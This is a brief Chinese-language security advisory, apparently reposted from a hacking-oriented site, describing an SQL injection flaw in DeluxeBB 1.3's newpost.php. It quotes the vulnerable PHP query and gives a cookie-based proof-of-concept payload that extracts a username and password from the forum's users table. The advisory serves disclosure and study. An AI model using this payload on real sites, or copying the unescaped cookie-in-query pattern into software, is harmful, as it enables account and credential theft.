DeluxeBB 1.3 newpost.php页面SQL注入漏洞
DeluxeBB的newpost.php页面没有正确地过滤用户所提交的SQL查询参数:
//inserting thread
$db->unbuffered_query("INSERT INTO ".$prefix."threads VALUES (NULL, ’$info[fid]’, ’".$_COOKIE[’memberid’]."’, ’$subject’, ’$posticon’, ’0’, ’0’, ’$lock’, ’$pin’, ’0’, ’".htmlspecialchars($_COOKIE[’membercookie’])."’, ’$time’)");
$tid = $db->insert_id();
Cookie变量memberid直接在SQL查询中使用,如果关闭了magic_quotes_gpc的话就会导致SQL注入攻击。必须将 membercookie变量设置为Guest才可以利用这个漏洞,否则无法绕过之前的检查。
测试代码:
membercookie=guest
memberid=xx’,(select+concat(username,0x2e,pass)+from+deluxebb_users+limit+1),’none’,0,0,0,0,0,’guest’,’1269081154’)+--+x
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.deluxebb.com
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。